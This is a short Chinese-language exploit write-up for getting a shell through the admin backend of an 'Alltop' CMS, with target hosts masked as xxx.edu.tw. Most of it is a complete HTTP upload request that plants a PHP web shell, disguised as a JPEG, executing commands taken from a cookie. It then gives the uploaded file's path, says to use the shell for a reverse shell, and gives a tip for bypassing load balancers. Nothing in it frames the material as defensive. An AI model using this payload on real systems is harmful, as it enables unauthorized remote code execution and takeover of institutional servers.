Alltop后台getshell

前提条件

将FileEncoding参数内容改成0

漏洞位置：/system/menu_mt_1_app.php?act=edit&key=0609112

payload

POST /system/menu_mt_1_app.php HTTP/1.1
Host: xxx.edu.tw
Connection: close
Content-Length: 1596
Cache-Control: max-age=0
sec-ch-ua: ” Not A;Brand”;v=”99″, “Chromium”;v=”100″, “Google Chrome”;v=”100″
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “Windows”
Upgrade-Insecure-Requests: 1
Origin: xxx.edu.tw
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundary5AwMj2LBUlmSQhpU
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: https://xxx.edu.tw/system/menu_mt_1_app.php?act=edit&key=0609111
Accept-Language: zh-CN,zh;q=0.9
Cookie: _gcl_au=1.1.1191374628.1650098912; _ga=GA1.3.173535008.1650098913; _gid=GA1.3.879435851.1650098913; _fbp=fb.2.1650098919235.1787572417; PHPSESSID=8574dc1133b0b66cc3e9c24b6cae4c87

——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”module”

system
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”sourceModule”

——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”p_no”

0609111.php
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”cust”

——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”p_up”

060911.php
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”p_id”

0
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”auth”

app_guest
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”type”

web
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”icon”

fas fa-circle
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”hide”

Y
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”name”

校內活動
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”filename”

http://www.xxx.edu.tw/
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”info”

——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”file”; filename=”Google.jpg”
Content-Type: image/jpeg

<?php system($_COOKIE[‘cmd’]); ?>
——WebKitFormBoundary5AwMj2LBUlmSQhpU
Content-Disposition: form-data; name=”act”

save
——WebKitFormBoundary5AwMj2LBUlmSQhpU–

上传文件路径：/skin/tnu/image/0609111.php.jpg

后续利用cmd反弹shell即可

遇到负载均衡先ping 网址 把网址替换成IP 通过IP访问